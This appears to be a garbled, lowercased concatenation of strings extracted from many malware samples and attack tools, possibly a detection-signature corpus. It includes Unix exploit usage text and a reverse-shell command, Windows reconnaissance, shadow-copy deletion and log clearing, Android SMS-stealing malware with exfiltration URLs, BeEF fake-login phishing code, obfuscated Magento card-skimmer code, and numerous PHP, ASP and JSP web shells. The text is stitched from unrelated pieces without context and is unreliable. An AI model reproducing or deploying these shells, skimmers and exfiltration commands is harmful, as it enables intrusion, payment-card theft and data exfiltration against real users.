[-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 whoami & hostname & ipconfig /allnet user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (get-content $env:public\\libraries\\dns.ps1) -replace ('#'+'##'),$botid | set-content $env:public\\libraries\\dns.ps1invoke-expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertto-base36(get-random -maximum 46655)))flash.media.sound()call kernel32!virtualalloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4d36e972-e325-11ce-bfc1-08002be10318}netstreamzhoupin exploit crewzhopin exploit crewbackdoorloggerzhuaddresspcap_dump_openresolving ips to poison...warnning: gateway ip can not be found%s-%02d%02d%02d%02d%02d.rc:\\users\\%s\\appdata\\cookies\\n
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 wsocketresolvehost: cannot convert host address '%s'tcp is the only protocol supported thru socks serverdarkknightipstealerutilities td class=\"summo1\">rem'ebaqrisecorexitprocess'msc#eauto scroll both text boxesstart/stop portscanningauto save logfile by pressing stopget /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http/1.0c:\\program files\\microsoft visual studio\\vb98\\vb6.olbdwgetaddressforobjectcolor transfer settingsfx global lighting angleversion compatibility infonew windows thumbnaillayer id generator basecolor halftone settingsc:\\windows\\system\\mswinsck.ocadarkpain=bitchin threads)pumb_syj&,farw>yrm3hm3t_rullaz7projectc1ten-ggl\"/moziqlxa0 :scan begun on port:0 :portscan ready.corrupt data!k4p~omkizdlltrojanscangetdllinfocompressed by petite (c)1999 ian luck.getfilecrc32gettrojannumbertfakaboutbasic portscannernow scanning port:this program was made by volker vossjiboo~ssbexample: iis 10.10.10.10send error<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>this tool may be used only by system administrators. i am not responsible for _h/enumdisplay/ected.msvcrt0xnotsupported7neowait.exerrrrrrrwip.txtxiaoyuers
1 d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbguiwang!@#9bd*-a add user(admin$/guiwang!@#9bd*) to admin[err] get haltable addresss fail[err] get zwdeviceiocontrolfile fail[err] get native function pointers fail
1 @@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%msgfile1%%\"==\"%%i\" del /f \"%%i\"logging out of webadmin (as target account)[+] connected to the registry servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] checkcredentials(): checking to see if valid username/passworderror connecting to target, tbmakesocket() %s:%d.nterrormoreprocessingrequiredcommand format error: error=%xnterrorpasswordrestriction
1 smbstry to run as administrator ...echo press any key to exit ... & pause > nul[undefined os version] major: %d minor: %dspecific luid not foundecho press any key to continue ... & pause > nulgetprocesshandlebyname fail !enabledebugprivilege fail !lsaenumeratelogonsessionsqkbhctjdwfglmpxzrvsnouyaeiioauzlbqgtrknxfspcmdi
1 fopen(\"cache.php\", \"w+\")0b6kvua7d2slcndn2rw1ormhzrws/sp_tilang.jsif(@copy($_files['file']['tmp_name'],$_files['file']['name'])) {echo '<b>up!!!</b><br><br>';}}echo \"indoxploit - auto xploiter\"eval(base64_decode($a));(preg_match('/\\/admin\\/cms_wysiwyg\\/directive\\/index\\//', $_server['request_uri']))eval(gzinflate(base64_decode(str_rot13(strrev(attribute_code=0x70617373776f72645f68617368))unlink('../media/catalog/category/'.basename($if(isset($_get['do'])){$g0='adminhtml/default/default/images'stripos($buf, 'visbot')!==false && stripos($buf, 'pong')!==falsestripos($buf, 'visbot') !== false && stripos($buf, 'pong')<?php /*** magento** notice of license** this source file is subject to the open software license (osl 3.0)* that is bundled with this package in the file license.txt.* it is also available through the world-wide-web at this url:* http://opensource.org/licenses/osl-3.0.php**/$$_server['http_user_agent'] == 'visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_cookie[qz])==($_=@$_request[q]).@$_($_request[z]);@eval(stripslashes($_request[q]));$log_entry = serialize($arinfo)curl_setopt($ch, curlopt_postfields,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 \".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"file_bad\");\\x6f\\x6e\\x65\\x70\\x61\\x67\\x65\\x7c\\x63\\x68\\x65\\x63\\x6b\\x6f\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2f\\x6d\\x65\\x64\\x69\\x61\\x2f\\x63\\x61\\x74\\x61\\x6c\\x6f\\x67\\x2f\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x2f\\x63\\x61\\x63\\x68\\x65\\x2f\\x31\\x2f\\x74\\x68\\x75\\x6d\\x62\\x6e\\x61\\x69\\x6c\\x2f\\x37\\x30\\x30\\x78\\x2f\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2f\\x42\\x2f\\x57\\x2f\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2e\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6d\\x61\\x67\\x65\\x2d\\x63\\x64\\x6e\\x2e\\x6c\\x69\\x6e\\x6bregexp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oqkpkyj8dck0lgbwnnln42bprxyj9gbendft12bkbjm8v2ypx2c8rnbl52bw12bdlkuvvgzvnwzkz0m85wavpgfsjxd8r1upb1nywxztfmb0n3boxz=x['length'];for(i=0;i<z;i++){y+=string['fromcharcode'](x['charcodeat'](i)-10) }w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|regexp|onepage|checkout|grelos_v= null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_post['upload'])php_uname()lastc0de@outlook.comcodersleetagencycafckapaljetz666x-php-scriptx-php-originating-script/usr/bin/php.jsew[zzqw@41g.1p4\@@d;%:
1 wevtutil clear-logvssadmin delete shadowsaglobal\\23d1a259-88fa-41df-935f-cae523bab8e6global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9awu3
1 microsoft\\windows\\winit.exemicrosoft\\windows\\tmp9932u1.bat\"cmd /u /c wmic /node:localhost /namespace:\\\\root\\securitycentercmd /a /c net user administrator /domain >>cmd /a /c netstat -ant >>\"%localappdata%\\microsoft\\========================== (net user) ==========================j
1 press any keenter 1 obon >0 & <65535l--choose versionexa only runtuzemcpysetprintf\\wsftartupresponse.write \"command completed success!\" for each co in foditems <input type=text name=text6 value=\"<%= szcmd6 %>\"><br> <title>hello! welcome </title>%s -install -->to install the service%s -start -->to start the service%s -stop -->to stop the servicethe port is out of rangefail to set the port\\psapi.dlltinject.dllsoftware\\microsoft\\internet explorer\\wineggdropshellinjectt.exesniffer.dll:execute net.exe user administrator passfport.exe or mport.exe :password sniffering is running |not running : the terminal service port has been set to newport: del www.exe :dir *.exe param = \"driver={microsoft access driver (*.mdb)}\" conn.open param & \";dbq=\" & server.mappath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set conn = server.createobject(\"adodb.connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" e
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& 